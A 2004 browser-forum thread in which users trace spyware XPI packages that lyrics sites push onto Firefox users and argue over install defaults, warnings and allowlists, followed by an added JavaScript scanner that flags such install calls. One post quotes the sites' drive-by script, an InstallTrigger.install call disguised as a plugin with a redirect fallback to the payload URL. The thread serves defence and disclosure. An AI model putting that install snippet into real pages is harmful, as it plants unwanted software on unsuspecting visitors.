We got another XPISpyware
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
We got another XPISpyware
http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm
It's there alright. I could only get it to pop up once, but after digging through the source, it's in an external js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th external script call, the one with all the characters. I would just paste it here but I don't know the legality in pasting their code.
Mindjunk
I didn't hear no bell...
- arch
- Posts: 85
- Joined: May 4th, 2003, 8:58 am
- Contact:
I poked around xpi a bit. Here's the summary:
Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net
-
- Posts: 2031
- Joined: February 6th, 2004, 11:59 am
see my proposed answer here
http://forums.mozillazine.org/viewtopic ... 828#463828
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
Here is what bridge is
http://www.kephyr.com/spywarescanner/li ... ndex.phtml
Mindjunk
I didn't hear no bell...
- logan
- Posts: 3453
- Joined: May 22nd, 2003, 3:51 pm
- Location: NGC 2403
- Contact:
-
- Posts: 370
- Joined: October 15th, 2003, 12:30 am
logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
- nexx
- Posts: 736
- Joined: July 29th, 2003, 1:23 am
- Location: Brisbane, Australia
- Contact:
iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
Office XP Menus: http://users.bigpond.net.au/nexx1/oxpmenu/ || Unofficial Firefox Branding: http://scragz.com/tech/mozilla/firefox-unofficial-branding.php
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... at least enough to know that they need to turn that option on. What I am concerned about is the newb user who, the first time they see that popup, is on a spywared site and won't know what to do; they may just press install. Try to remember that most people won't know what extensions are or even use them once fx starts getting mass deployment; everyone here uses extensions but we aren't average users.
Mindjunk
I didn't hear no bell...
- MonkeeSage
- Posts: 1011
- Joined: December 20th, 2002, 8:15 pm
I'd like to see a message box like AnonEmoose suggested, something along the lines of...
"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."
...with the 'critical' icon on the prompt.
Shelumi`El
Jordan
S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman
- wildman
- Posts: 222
- Joined: June 20th, 2003, 12:20 pm
- Location: Florida
theshooter wrote:logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develop; very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...
Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373
- wildman
- Posts: 222
- Joined: June 20th, 2003, 12:20 pm
- Location: Florida
I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi
Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...
We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531
...and possibly support/contribute anti-spyware solutions to their project in the form of a SpyBot plugin/extension.
I made a similar comment on a Moz related blog recently, that may interest you.
Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...
- Kraftwerk
- Posts: 106
- Joined: April 2nd, 2004, 3:04 pm
nexx wrote: iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.
I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
aye, it's an external script,
tries
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}
and I am using the newest build and still it's happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...
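Added example, not part of the original thread or any poster's code: a static scan of script text that finds XPI URLs, reports whether each is delivered through InstallTrigger or through a navigation call such as the location.replace fallback quoted above, and checks the host against an allowlist of the kind proposed earlier in the thread. ALLOWED_HOSTS, the function names and the third sample line are assumptions constructed for illustration.

```javascript
// Hypothetical allowlist of hosts permitted to offer XPI installs (assumption).
const ALLOWED_HOSTS = new Set(['addons.example.org']);

// Any quoted http(s) URL whose path ends in .xpi (optional query string).
const XPI_URL = /['"](https?:\/\/[^'"\s]+?\.xpi)(?:\?[^'"]*)?['"]/gi;

// Decide how the URL at `index` is delivered by looking at the text just before it.
function classify(script, index) {
  const before = script.slice(Math.max(0, index - 120), index);
  // Still inside an unclosed InstallTrigger.<method>( ... call
  if (/InstallTrigger\s*\.\s*\w+\s*\([^)]*$/.test(before)) return 'InstallTrigger';
  // URL is the argument of location.replace/assign or assigned to location(.href)
  if (/location\s*\.\s*(replace|assign)\s*\(\s*$/.test(before)) return 'navigation';
  if (/location(\s*\.\s*href)?\s*=\s*$/.test(before)) return 'navigation';
  return 'reference';
}

// Return one finding per XPI URL found in the script text.
function findXpiTriggers(script) {
  const findings = [];
  for (const m of script.matchAll(XPI_URL)) {
    const host = new URL(m[1]).hostname;
    findings.push({
      url: m[1],
      host,
      method: classify(script, m.index),
      allowed: ALLOWED_HOSTS.has(host),
    });
  }
  return findings;
}

// Constructed sample: the two calls quoted in the thread plus one
// made-up call to an allowlisted host for contrast.
const SAMPLE = [
  "InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});",
  "location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');",
  "InstallTrigger.install({'Demo Theme' : 'https://addons.example.org/demo.xpi'});",
].join('\n');

for (const f of findXpiTriggers(SAMPLE)) {
  console.log(`${f.allowed ? 'allow' : 'BLOCK'} ${f.method} ${f.host}`);
}
```

The navigation case matters because a check that only watches InstallTrigger calls misses the fallback that points the page straight at the .xpi file.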